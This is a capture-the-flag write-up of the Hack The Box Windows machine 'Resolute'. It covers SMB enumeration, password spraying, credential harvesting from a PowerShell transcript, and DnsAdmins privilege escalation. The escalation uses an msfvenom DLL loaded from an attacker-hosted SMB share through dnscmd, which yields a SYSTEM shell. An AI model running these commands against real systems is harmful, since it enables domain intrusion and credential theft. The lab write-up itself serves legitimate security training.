Resolute
Find your way…
Resolute is an easy difficulty machine running Windows. It tests your knowledge in enumeration which leads you to accessing the system and privilege escalation through exploiting a system service.
Edit: Fixed error stating “It tests your knowledge in OSINT”. This was meant to be enumeration and has been updated accordingly. Don’t copypasta templates without updating them correctly kids! Thanks to plast1k on Reddit for pointing it out.
Be sure to checkout the Basic Setup section before you get started.
Enumeration
Like always, enumeration is our first port of call. Let’s take a look at the machine and see what we are dealing with.
Portscan
portscan resolute.htb
Grabbing ports...
Ports grabbed!
Scanning...
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-09 22:28 PST
Nmap scan report for resolute.htb (10.10.10.169)
Host is up (0.24s latency).
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019-12-10 06:28:00Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49688/tcp open msrpc Microsoft Windows RPC
49821/tcp open unknown
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h39m17s, deviation: 4h37m08s, median: -43s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2019-12-09T22:30:18-08:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2019-12-10T06:30:22
|_ start_date: 2019-12-10T06:23:37
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 283.53 secondsA couple of things stand out. WinRM is accessible via port 5985 and we see that the SMB port 445 is also available.
Enum4Linux
Let’s go ahead and enumerate SMB as that can be quite fruitful at times.
enum4linux 10.10.10.169
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Dec 9 22:45:19 2019
==========================
| Target Information |
==========================
Target ........... resolute.htb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=============================
| Users on resolute.htb |
=============================
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail Name: (null) Desc: (null)
........... Snip ...........
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus Name: (null) Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to W....123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: (null) Desc: (null)
........... Snip ...........A lot of detail is outputted and we find a bunch of users!
We can see the account marko has a description that references a password. However, when we check this password against markos account we find it is invalid.
Thinking about companies and how their onboarding process may be we can take from the description that when a new staff member has an account created the default password is potentially the one we found.
Once the new staff member logs in they are probably directed to change their password. Hence why the password didn’t work for marko.
Taking all the users we found we can throw them in a file and check the password against them all:
SMB Login
We can do this using the smb_login module in Metasploit:
msf5 auxiliary(scanner/smb/smb_login) > run
[*] 10.10.10.169:445 - 10.10.10.169:445 - Starting SMB login bruteforce
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\Administrator:W....123!',
........... Snip ...........
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\claude:W....123!',
[+] 10.10.10.169:445 - 10.10.10.169:445 - Success: '.\melanie:W....123!'
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\zach:W....123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\simon:W....123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\naoki:W....123!',
[*] resolute.htb:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completedWe find that the password works with the user melanie.
User
Let’s go check it out:
evil-winrm -i 10.10.10.169 -u melanie -p W...123!
Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint
PS C:\Users\melanie\Documents> cat ../Desktop/user.txt
0c3be45fcf....8d3a978540We get the user flag!
Checking out the user information for melanie we can’t see anything that stands out at us.
Looking for other users we see the user ryan in C:\Users.
Taking a look in the usual directories doesn’t show anything of use.
Since we have access to Powershell let’s use it’s “power” to look for any hidden files!
PS C:\Users> Get-ChildItem -Path C:\ -Include *.txt -Hidden -File -Recurse -force -ErrorAction SilentlyContinue
Directory: C:\PSTranscripts\20191203
Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt Hmm… a Powershell Transcript. This is kind of similar to .bash_history in Linux. The Start-Transcript command creates a history of a PowerShell session and output’s it to a file. The transcript includes all commands that the user types and all output that appears on the console.
Nice, let’s not wait anytime in checking that out then:
PS C:\PSTranscripts\20191203> cat PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan S....123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
********************** Everyone seems to like using 123 in their passwords!
In the file we can see that the transcript is for the user ryan and find another password.
Let try accessing this new account:
evil-winrm -i 10.10.10.169 -u ryan -p S....123!And we are in.
Root
Let’s waste no time in checking the users privileges:
PS C:\Users\ryan\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set EnabledWe see that ryan is apart of the DnsAdmins group. A quick search online shows a way to escalate using serverlevelplugindll option in dnscmd.exe.
There are two methods to accomplishing this. By using a msfvenom payload remotely (to avoid the AV) using impackets smbserver.py to host the .dll.
Alternatively, you can create your own .dll to avoid the AV and host it locally (NOTE: It can also be used remotely but thats no fun!). You can follow this method here.
First we will use msfvenom and metasploit. Create our payload:
msfvenom -p windows/x64/shell_bind_tcp LHOST=<attacker-ip> LPORT=<attacker-port> -f dll > shell.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 499 bytes
Final size of dll file: 5120 bytesWe then host the .dll via smbserver on the attacker machine:
smbserver.py TMP /root/Shells/share
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsedWe then setup our metasploit handler:
msf5 exploit(multi/handler) > set payload windows/x64/shell_bind_tcp
payload => windows/x64/shell_bind_tcp
msf5 exploit(multi/handler) > set lport 1234
msf5 exploit(multi/handler) > set rhost 10.10.10.169
msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/x64/shell/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 1234 yes The listen port
RHOST 10.10.10.169 no The target address
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) > run
[*] Started bind TCP handler against 10.10.10.169:1234
[*] Sending stage (336 bytes) to 10.10.10.169On the victim machine we then set our .dll to be loaded when the dns service is restarted.
We then restart the service:
C:\Users\ryan\Downloads> dnscmd /config /serverlevelplugindll \\10.10.14.40\TMP\shell.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
PS C:\Users\ryan\Downloads> sc.exe stop dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x1
WAIT_HINT : 0x7530
PS C:\Users\ryan\Downloads> sc.exe start dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 2756
FLAGS : You will see in the smbserver output that resolute executes the .dll:
[*] Incoming connection (10.10.10.169,52935)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
[*] RESOLUTE$::MEGABANK:4141414141414141:398df5875fb62f7ce834603948ffcdaa:01010000000000008053f8ccb7afd501e85de9fe88e966db00000000010010004600590057006900770069007400460002001000700073004a0055006900480046004300030010004600590057006900770069007400460004001000700073004a0055006900480046004300070008008053f8ccb7afd501060004000200000008003000300000000000000000000000004000009be720f2b9f3b0f3138acd75092b55330464bd29d76a96706e41aceb9c94d64d0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00340030000000000000000000You should then see a session open with your metasploit handler:
[*] Command shell session 1 opened (10.10.14.40:40671 -> 10.10.10.169:1234) at 2019-12-10 16:18:37 -0800
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
e1d94876a5....b5405e619cCongrats! We have our root flag :)
Conclusion
This machine was pretty fun. I liked the fact that the privilege escalation to root used a system service that is deemed a “feature” by Microsoft. In a real world scenario it is common for multiple people to have access to group privileges relating to system services. So this machines scenario isn’t that far out of the realms of possibility.
